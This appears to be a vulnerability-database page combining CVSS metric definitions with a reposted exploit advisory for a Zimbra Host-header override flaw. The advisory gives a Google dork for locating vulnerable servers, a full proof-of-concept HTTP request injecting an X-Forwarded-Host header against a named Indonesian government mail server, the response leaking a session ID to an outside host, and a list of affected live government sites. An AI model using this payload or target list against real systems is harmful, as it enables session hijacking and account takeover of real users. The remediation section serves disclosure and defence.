The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Zimbra - Request URL Override Vulnerability
#############################################################
# Exploit Title: Zimbra - Request URL Override Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: The A Team - Kejaksaan Agung
# Google Dork: inurl:/public/launchSidebar.jsp
# Software Vendor: Zimbra
# Software Version: *
# Software Link: https://www.zimbra.com/downloads
# Date: 2022-05-09
#############################################################
[*] About:
----------
Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) before 2019, is a collaborative software suite that includes an email server and a web client.
#############################################################
[*] Detail:
-----------
Some applications and frameworks support HTTP headers that can be used to override parts of the request URL, potentially affecting the routing and processing of the request.
Intermediate systems are often oblivious to these headers. In the case of reverse proxies and web application firewalls, this can lead to security rulesets being bypassed. If a caching system is in place, this may enable cache poisoning attacks. These headers may also enable forging of log entries.
Even if the application is intended to be accessed directly, some visitors may be using a corporate proxy enabling localised cache poisoning.
The application appears to support the use of a custom HTTP header to override the Host header.
Attacker added the following headers to the request:
X-Forwarded-Host: cxsecurity.com
A value from these headers was reflected in the response, showing that a header was processed.
#############################################################
[*] Impact:
-----------
This Zimbra vulnerability leaks users' cookies when they are redirected to a malicious site, allowing attackers to take over accounts via session (See value of response header "location").
#############################################################
[*] Remediation:
----------------
To fully resolve this issue, locate the component that processes the affected headers, and disable it entirely. If you are using a framework, applying any pending security updates may do this for you.
If this isn't practical, an alternative workaround is to configure an intermediate system to automatically strip the affected headers before they are processed.
#############################################################
[*] PoC:
--------
# Request:
GET /public/launchSidebar.jsp HTTP/2
Host: mail.polri.go.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=4ada1b4f-e1b2-42de-940e-5ecfb2a02148
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
X-Forwarded-Host: cxsecurity.com
Pragma: no-cache
Cache-Control: no-cache
TE: trailers
# Response:
HTTP/2 302 Found
server: nginx
date: Mon, 09 May 2022 04:48:53 GMT
content-type: text/html;charset=utf-8
content-length: 0
strict-transport-security: max-age=31536000
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-robots-tag: noindex
x-frame-options: SAMEORIGIN
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, max-age=0
pragma: no-cache
set-cookie: JSESSIONID=node0foto54zfs581as22ufve2d6p53332.node0;Path=/
location: http://cxsecurity.com/;jsessionid=node0foto54zfs581as22ufve2d6p53332.node0?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED
X-Firefox-Spdy: h2
#############################################################
[*] Affected:
--------------
https://mail.polri.go.id/public/launchSidebar.jsp
https://mail.kejaksaan.go.id/public/launchSidebar.jsp
And other vital Indonesian websites.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum